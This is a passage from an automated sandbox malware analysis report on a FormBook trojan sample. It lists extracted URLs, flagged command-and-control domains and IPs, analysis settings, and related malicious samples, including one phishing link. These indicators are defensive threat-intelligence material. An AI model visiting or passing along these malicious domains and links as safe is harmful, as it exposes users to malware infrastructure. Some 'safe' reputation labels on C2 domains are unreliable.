https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.freedompopo.com/dy13/www.bdsmnutzbar.info	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.umeshraja.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.484844.vip	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyupok.xyz/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.883106.photos/dy13/www.tyupok.xyz	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carefulapp.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carefulapp.com/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sdplat.media/dy13/www.soloparentconnect.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cpuk-finance.com/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.484844.vipReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.b0ba138.xyzReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.real-estate-96841.bond	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.mi	explorer.exe, 00000005.00000000.1674090829.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4102382128.000000000CA63000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.imuschestvostorgov.onlineReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taini00.net/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bdsmnutzbar.info/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cpuk-finance.com/dy13/www.acc-pay.top	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000005.00000000.1664847019.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1665286520.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1666809306.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carefulapp.comReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carefulapp.com/dy13/www.freedompopo.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.umeshraja.com/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sdplat.media/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.226.182.14	reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com	United States	14618	AMAZON-AESUS	true
185.53.179.90	www.real-estate-96841.bond	Germany	61969	TEAMINTERNET-ASDE	true
185.151.30.212	www.cpuk-finance.com	United Kingdom	48254	TWENTYIGB	true
3.33.130.190	umeshraja.com	United States	8987	AMAZONEXPANSIONGB	true
147.92.43.172	2tduz67r.as66588.com	Hong Kong	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	true
104.21.74.89	www.b0ba138.xyz	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465619
Start date and time:	2024-07-01 21:24:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mQY9ka5sW6hv2Ri.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@524/1@12/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 156 Number of non-executed functions: 291
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: mQY9ka5sW6hv2Ri.exe

Simulations

Behavior and APIs

Time	Type	Description
15:24:52	API Interceptor	1x Sleep call for process: mQY9ka5sW6hv2Ri.exe modified
15:25:00	API Interceptor	10559077x Sleep call for process: explorer.exe modified
15:25:44	API Interceptor	9369216x Sleep call for process: msdt.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.226.182.14	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	www.sdplat.media/dy13/?jDHph=ZKZE34m65eQ5fgmhhL/Oxkx+yV2XZDJ4QNe5btj3ut8Iv1OZ3MT37vqx3/rNgL3wKgTJnNuPCQ==&Wt=IBZX4leh3ZCl
	Forligsmnd.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/gu1b/
	venerationens.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/5ogg/
	Interviewed.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/5ogg/
	Fishpoles.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/5ogg/
	Moderatestes.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/gu1b/
	Sandflugters.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/tsq7/
	Yolk.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/hjen/
	Lokalplanlgningen.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/tsq7/
	Reaeration.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.himebauch.live/tsq7/
185.53.179.90	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	www.abandoned-houses-39863.bond/rn94/?SXm49b=+TOTySD/xKzI1m9iyt2YV9oe7irabqlb0FG3M+MtGGXp3TOb0Tp0F4yVfcCxStplS5t4N3XNSA==&CP60e=Nj5TAPxx-d38Ipw0
	TT-SWIFT-Schindler.exe	Get hash	malicious	FormBook	Browse	www.flower-us-delivery.bond/m10e/
	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	www.real-estate-96841.bond/dy13/?ITots6U=QEHoM+bsIXkyCOBHdtOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAi68MzzIie5&DHRL9=9rjXGh4
	100560251 jpg.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.mid-size-suv-87652.com/kmge/
	SecuriteInfo.com.Trojan.DownLoader45.65183.28425.18884.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.mid-size-suv-87652.com/kmge/
	emir_PDF.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.dental-implants-52958.com/ges9/?C4=dcmsN+euVkSaJmWI0es1ah40w3uZLJeCAwbD+x+ksTCqkmjtc8ueAQxOeNoJ/HKOJwS3&E6=1buXqVShNpY
	proforma_fatura_pdf.exe	Get hash	malicious	FormBook	Browse	www.dental-implants-52958.com/ges9/?2dB=dcmsN+euVkSaJmWI0es1ah40w3uZLJeCAwbD+x+ksTCqkmjtc8ueAQxOeOIzvWq2TXzw&p48=fN9hZlFPFF
	Hesaphareketi-01.exe	Get hash	malicious	FormBook	Browse	www.house-market-83622.com/by94/?W4hT-=gPs4R5Rrv4fddvFtkP8of0e3GovuEZtbdBz7MYF1aEh4TEQYkoh0nFDVShvD+z7TosQdHEZxEw==&4hI=-ZwP8bDh3ZxXB
	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.furniture-61686.com/mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV
	ekstre_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.furniture-42269.com/mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL
185.151.30.212	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	www.cpuk-finance.com/dy13/?Efvh=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEi2D8lS3FgFVwKwvg==&ndsh-n=RzuPe
185.151.30.212	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	www.cpuk-finance.com/dy13/?ITots6U=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPHOpbM5p0ydZ&DHRL9=9rjXGh4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
2tduz67r.as66588.com	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	147.92.43.172
2tduz67r.as66588.com	lhDCR5RvXwLbWQu.exe	Get hash	malicious	FormBook	Browse	147.92.43.172
reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	3.226.182.14
reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com	lhDCR5RvXwLbWQu.exe	Get hash	malicious	FormBook	Browse	3.226.182.14
www.real-estate-96841.bond	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
www.b0ba138.xyz	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	172.67.168.2
www.cpuk-finance.com	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	185.151.30.212
	lhDCR5RvXwLbWQu.exe	Get hash	malicious	FormBook	Browse	185.151.30.212
	IZPnmcCu5EZWa98.exe	Get hash	malicious	FormBook	Browse	185.151.30.212
	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	185.151.30.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZONEXPANSIONGB	https://rlcold.com/projects/	Get hash	malicious	Unknown	Browse	52.223.34.155
	Quotation List Pdf.exe	Get hash	malicious	FormBook	Browse	3.33.244.179
	2024 Lusail Fence-WITH STICKER-2-003.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	h8N9qpyRAPaiitu.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	DHL Receipt_AWB#20240079104.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	file.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	Doc3.docx	Get hash	malicious	Unknown	Browse	52.223.40.198
	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	AWB 112-17259653.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
AMAZON-AESUS	https://url7304.disco-mailer.net/ls/click?upn=u001.DWLeRfOXStcSaUNphm6ZnGquuezyvOF0FIuLMCSCrIQ9t3e8n3fjexKHJjVTV-2BQUFT1dnxR3BcyXaxz-2BblhjX71zswvTIlAGm31luuFhJgeOGXb3dn9Itq74-2Fe-2BlKg-2BsifZ0P3LuL0HqpFUcy5KfK9QeOmqsfmIEc7vCi5RUNYAmHuUkmPbyWNQo21wM4ryo-2FADTfkOHCFzQz9AfxslydM-2BQsZbYdRmEOsrKC6-2BHKIs-3DDCG-_5KlZmZKASPtIpYbHU6HHQmxS-2FHe3g010GX01BBBmlalJnMdBClXoEYQADKPWInqgHw-2B5921oa-2Fum9DxIHV8wgOarlsOnYJwzp6I2lNDfeCSZBLYE5encCC3TGSWK2LST4tKK1uZVi4Xb22gSLa7ZYTGX5jE2xI-2FJGPm05-2FCw7wD7pg9S-2BMlyoLVyYYI8XzxlbyIibtSxK5W34N4zUZcdEdWsHl9BgrHyN42GvxqNWNxOcvycXMS4jIOdp4d6ScmDF-2BS6MhsBDgIQSJ8ghxJEmce30vrIXxr7TL-2BhC3-2BvVpeuPaT49M08MEQU3810FxWnRV-2Fb0eBiTGYcXY48d1SDaE1rDl8oYsyAd2YQadCaGkdgfEKfDLAyjoaWqdQQl4JU	Get hash	malicious	HTMLPhisher	Browse	44.214.123.156
	https://workforce.us2.sterlingcheck.app/Account/Begin?ORDERDATA=kv%7cthg0qDmA6mST2O%2fGsPpgVw1I4wZV%7cbPqHWgkwEQReNVW09XAyGMlbzgNeO8euWMp9p7QVwZ%2fAJNhpujQsgJiv3iNNC6l%7c6N5v%2fwXfdWw%3d&locale=en-US	Get hash	malicious	Unknown	Browse	54.198.170.180
	ikFn0h3xhF.elf	Get hash	malicious	Mirai	Browse	54.56.77.203
	Lu4qSit8YR.elf	Get hash	malicious	Unknown	Browse	44.207.141.48
	lQC7IiMNX1.elf	Get hash	malicious	Mirai	Browse	54.224.114.193
	2T9ShVKj85.elf	Get hash	malicious	Mirai	Browse	54.56.30.249
